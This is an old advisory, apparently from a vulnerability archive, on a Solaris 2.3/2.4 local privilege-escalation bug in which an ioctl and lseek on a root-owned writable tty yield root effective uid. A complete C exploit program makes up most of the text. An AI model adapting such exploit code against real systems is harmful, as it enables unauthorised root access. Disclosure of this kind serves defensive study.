COMMAND

    uid

SYSTEMS AFFECTED

    Solaris 2.3, 2.4

PROBLEM

    Shawn Instenes claims he got  this from some engineers at  Sun. He
    said that a patch existed for  2.4 but not 2.3. Well, there  is no
    patch for any of these two according to one source.

    If a tty port that is writeable  by the user and owned by root  is
    opened and the  I_PUSH "ms" ioctl  call made followed  by an lseek
    the  effective  uid  of  the  user  is  changed  to root.  Exploit
    follows:

    #include <stdio.h>
    #include <unistd.h>
    #include <fcntl.h>
    #include <sys/types.h>
    #include <stropts.h>
    #include <sys/stat.h>
    #include <sys/conf.h>

    main(argc, argv)
        int argc;
        char* argv[];
    {
        int fd;

        if (argc < 2)
            {
            fprintf(stderr, "usage: %s /dev/ttyX\n", argv[0]);
            exit(1);
            }

        fd = open("/dev/ttyb", O_RDWR);
        printf("Your current effective uid is %d\n", geteuid());
        ioctl(fd, I_PUSH, "ms");
        lseek(fd, 0, 1);
        printf("Your effective uid has been changed to %d\n", geteuid());
    }

SOLUTION

    Since this  is rather  old bug,  I guess  fix is  out.   If not (I
    doubt) buy to yourself newer Solaris.